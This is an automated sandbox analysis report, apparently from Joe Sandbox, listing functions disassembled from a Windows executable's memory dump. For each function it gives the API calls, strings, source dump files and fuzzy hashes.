                                                                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0038B5BD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                    • Opcode ID: 5bc7cc6270b79c199d944ec55850def8dc507e3adf09b15a22c583141c3ef5a8
                                                                                                                    • Instruction ID: 90cd4986608f391d684a93343ee84bde8abb103147ec997f4d0f01d005189887
                                                                                                                    • Opcode Fuzzy Hash: 5bc7cc6270b79c199d944ec55850def8dc507e3adf09b15a22c583141c3ef5a8
                                                                                                                    • Instruction Fuzzy Hash: 89319435A0030ADFCB12FF68D845EAEB7B8FF0A310F1441A6E505DB291DB719A42CB51
                                                                                                                    Function 00378F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                      • Part of subcall function 0037AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0037AABC
                                                                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00379014
                                                                                                                    • GetDlgCtrlID.USER32 ref: 0037901F
                                                                                                                    • GetParent.USER32 ref: 0037903B
                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0037903E
                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00379047
                                                                                                                    • GetParent.USER32(?), ref: 00379063
                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00379066
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 1536045017-1403004172
                                                                                                                    • Opcode ID: 228bf2c3195996dc096cabb0f36ed5e120d8290088386f5d012d9de6a043de47
                                                                                                                    • Instruction ID: e449931a2d2f3a346106bfe48d8f9e4e02b6116f8776dd5788780aec7236aa64
                                                                                                                    • Opcode Fuzzy Hash: 228bf2c3195996dc096cabb0f36ed5e120d8290088386f5d012d9de6a043de47
                                                                                                                    • Instruction Fuzzy Hash: 6C21F571A00108BFDF16ABA0DC85EFEBB78EF4A310F10421AF925972B1DB795815DB60
                                                                                                                    Function 0037907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                      • Part of subcall function 0037AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0037AABC
                                                                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003790FD
                                                                                                                    • GetDlgCtrlID.USER32 ref: 00379108
                                                                                                                    • GetParent.USER32 ref: 00379124
                                                                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00379127
                                                                                                                    • GetDlgCtrlID.USER32(?), ref: 00379130
                                                                                                                    • GetParent.USER32(?), ref: 0037914C
                                                                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0037914F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 1536045017-1403004172
                                                                                                                    • Opcode ID: 14777c558f52e849488641174edd277576720265f67fdc977856854f8451a2a3
                                                                                                                    • Instruction ID: 894a5f04ad6ad885b12aff0aaefd89399372d28c89bc6e91a4ab1b98164c9e38
                                                                                                                    • Opcode Fuzzy Hash: 14777c558f52e849488641174edd277576720265f67fdc977856854f8451a2a3
                                                                                                                    • Instruction Fuzzy Hash: FA21D375A00108BFDF12ABA0CC85EFEBB78EF45300F004116F915972A1DB798815DB60
                                                                                                                    Function 00379163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetParent.USER32 ref: 0037916F
                                                                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00379184
                                                                                                                    • _wcscmp.LIBCMT ref: 00379196
                                                                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00379211
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                    • API String ID: 1704125052-3381328864
                                                                                                                    • Opcode ID: c7beb419e1ade25f6856cd73783a2e789a13520a61363f313b069bcbb12b5b90
                                                                                                                    • Instruction ID: acb14cfaa1749718423ebd100280fe65f49f04d891ede50cd0e3f0fae45b8b53
                                                                                                                    • Opcode Fuzzy Hash: c7beb419e1ade25f6856cd73783a2e789a13520a61363f313b069bcbb12b5b90
                                                                                                                    • Instruction Fuzzy Hash: E2113A3728830BBAFA233624EC16FE7379C9B11360B214527F904E84E2FF65A8615984
                                                                                                                    Function 00387990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00387A6C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafeVartype
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1725837607-0
                                                                                                                    • Opcode ID: 974ff4ac9fb3a66e7e360e98c4b8668d912b5ba0f4bbe57bef2e6bd340301886
                                                                                                                    • Instruction ID: 25f002828d2debd1973c04c49a149ddd0198fc2945d142cf18e55215d4773da9
                                                                                                                    • Opcode Fuzzy Hash: 974ff4ac9fb3a66e7e360e98c4b8668d912b5ba0f4bbe57bef2e6bd340301886
                                                                                                                    • Instruction Fuzzy Hash: B5B19E719043199FDB12EFA5C884BBEB7FAEF09321F2544A9E601EB251D734E941CB90
                                                                                                                    Function 0032FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0032FAA6
                                                                                                                    • OleUninitialize.OLE32(?,00000000), ref: 0032FB45
                                                                                                                    • UnregisterHotKey.USER32(?), ref: 0032FC9C
                                                                                                                    • DestroyWindow.USER32(?), ref: 003645D6
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0036463B
                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00364668
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                    • String ID: close all
                                                                                                                    • API String ID: 469580280-3243417748
                                                                                                                    • Opcode ID: 6ccf6acb476a12162a76929487a3b1b2faf2a9a202cd2e2df8c9d4610af820a3
                                                                                                                    • Instruction ID: 1467617f1bc1d486573d732242459ab6a950ad48d72a83e58752d2f49205f738
                                                                                                                    • Opcode Fuzzy Hash: 6ccf6acb476a12162a76929487a3b1b2faf2a9a202cd2e2df8c9d4610af820a3
                                                                                                                    • Instruction Fuzzy Hash: 65A16C31B01222CFCB2BEF14D595A69F7A4AF05700F5582BDE90AAB265CB30ED16CF50
                                                                                                                    Function 00399113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit$_memset
                                                                                                                    • String ID: ,,;$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                    • API String ID: 2862541840-903716602
                                                                                                                    • Opcode ID: f7c114fb17582213ac7547e73e1c918ea444797bf0e7bd285d720a1e3015dccc
                                                                                                                    • Instruction ID: e497e15ecf9e232a431f9840ed8baf14c305948075393e0077ee6f7e63e9e768
                                                                                                                    • Opcode Fuzzy Hash: f7c114fb17582213ac7547e73e1c918ea444797bf0e7bd285d720a1e3015dccc
                                                                                                                    • Instruction Fuzzy Hash: 1A919F71A00219ABDF26DFA9D888FAFB7B8EF45710F10855EF515AB280D7709944CFA0
                                                                                                                    Function 0037A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EnumChildWindows.USER32(?,0037A439), ref: 0037A377
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ChildEnumWindows
                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                    • API String ID: 3555792229-1603158881
                                                                                                                    • Opcode ID: edafbc39465096bdec8bd78ebdcfa514a3997788ca6403d278f33006fcc5cbdd
                                                                                                                    • Instruction ID: 1d1b23f7a12e435bbb5a3b4bb19aa097089846af4130d5377c9e90e52270e2fb
                                                                                                                    • Opcode Fuzzy Hash: edafbc39465096bdec8bd78ebdcfa514a3997788ca6403d278f33006fcc5cbdd
                                                                                                                    • Instruction Fuzzy Hash: 55910631A00A05AADB2ADFA0C491BEDFBB8FF44300F54C519E84DAB251DF356999CBD1
                                                                                                                    Function 00322E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00322EAE
                                                                                                                      • Part of subcall function 00321DB3: GetClientRect.USER32(?,?), ref: 00321DDC
                                                                                                                      • Part of subcall function 00321DB3: GetWindowRect.USER32(?,?), ref: 00321E1D
                                                                                                                      • Part of subcall function 00321DB3: ScreenToClient.USER32(?,?), ref: 00321E45
                                                                                                                    • GetDC.USER32 ref: 0035CD32
                                                                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0035CD45
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0035CD53
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0035CD68
                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 0035CD70
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0035CDFB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                    • String ID: U
                                                                                                                    • API String ID: 4009187628-3372436214
                                                                                                                    • Opcode ID: c6ab599e02777a9d3eed7b11d65405a2483a77c2d218ec729304a036cfe6523a
                                                                                                                    • Instruction ID: 626725052e25bdeb354e16eddd194808c9c2931965031629a712364509dc23b9
                                                                                                                    • Opcode Fuzzy Hash: c6ab599e02777a9d3eed7b11d65405a2483a77c2d218ec729304a036cfe6523a
                                                                                                                    • Instruction Fuzzy Hash: 8371C031500205EFCF238F64DC80EAA7BB9FF4932AF15526AED559A2B6C7318C45DB60
                                                                                                                    Function 00391A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00391A50
                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00391A7C
                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00391ABE
                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00391AD3
                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00391AE0
                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00391B10
                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00391B57
                                                                                                                      • Part of subcall function 00392483: GetLastError.KERNEL32(?,?,00391817,00000000,00000000,00000001), ref: 00392498
                                                                                                                      • Part of subcall function 00392483: SetEvent.KERNEL32(?,?,00391817,00000000,00000000,00000001), ref: 003924AD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2603140658-3916222277
                                                                                                                    • Opcode ID: a658aba5bb3c15a615f3e768814f0c3b1d98a70336c011be1e80d184b72d2838
                                                                                                                    • Instruction ID: fb0148d6fa76567745742125cf6f990ce4033304a277e6b2a982922d507c053e
                                                                                                                    • Opcode Fuzzy Hash: a658aba5bb3c15a615f3e768814f0c3b1d98a70336c011be1e80d184b72d2838
                                                                                                                    • Instruction Fuzzy Hash: D1416EB1501619BFEF139F50CC89FBB7BADEF09354F00412AFA05AA191E7719E449BA0
                                                                                                                    Function 00398C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,003AF910), ref: 00398D28
                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003AF910), ref: 00398D5C
                                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00398ED6
                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00398F00
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 560350794-0
                                                                                                                    • Opcode ID: 1c10e2e1d3add07d67523cc895120a770aa13d3f9b49fc14bc4814e2364f9804
                                                                                                                    • Instruction ID: dce31b65d1581cf4fc9a305dd10d8e59ace10a421824f2b53b645627fc40bd26
                                                                                                                    • Opcode Fuzzy Hash: 1c10e2e1d3add07d67523cc895120a770aa13d3f9b49fc14bc4814e2364f9804
                                                                                                                    • Instruction Fuzzy Hash: 50F16B71A00209EFDF15DF98C884EAEB7B9FF89314F108459F915AB251DB31AE46CB50
                                                                                                                    Function 0039F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0039F6B5
                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0039F848
                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0039F86C
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0039F8AC
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0039F8CE
                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0039FA4A
                                                                                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0039FA7C
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0039FAAB
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0039FB22
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4090791747-0
                                                                                                                    • Opcode ID: 30169a4774e526b2a9c8a1199eca2bdc43f2c985a9daf87b49efe8bbab7db186
                                                                                                                    • Instruction ID: f8d547de9ea451e944ada4829f66bcd14b3bbaecd0c284a7fa44f124605f9fc4
                                                                                                                    • Opcode Fuzzy Hash: 30169a4774e526b2a9c8a1199eca2bdc43f2c985a9daf87b49efe8bbab7db186
                                                                                                                    • Instruction Fuzzy Hash: 7BE1C3316043009FCB16EF24D891B6ABBE5EF85354F18856DF8999F2A2CB31EC45CB52
                                                                                                                    Function 00384CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0038466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00383697,?), ref: 0038468B
                                                                                                                      • Part of subcall function 0038466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00383697,?), ref: 003846A4
                                                                                                                      • Part of subcall function 00384A31: GetFileAttributesW.KERNEL32(?,0038370B), ref: 00384A32
                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00384D40
                                                                                                                    • _wcscmp.LIBCMT ref: 00384D5A
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00384D75
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 793581249-0
                                                                                                                    • Opcode ID: 3bcc125bdda4ef3aaf8bf858f7f8f40cc662bfad79a293e1f37ebab7d77d6531
                                                                                                                    • Instruction ID: 5c0b807e52a0087fbebfd6e3c0421ca44c47ed292c1233070fcdafb43578c4d1
                                                                                                                    • Opcode Fuzzy Hash: 3bcc125bdda4ef3aaf8bf858f7f8f40cc662bfad79a293e1f37ebab7d77d6531
                                                                                                                    • Instruction Fuzzy Hash: 8B5187B24083459BC726EBA0D881DDFB3ECAF85310F40096EF685D7552EF34A688C756
                                                                                                                    Function 003A8645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003A86FF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
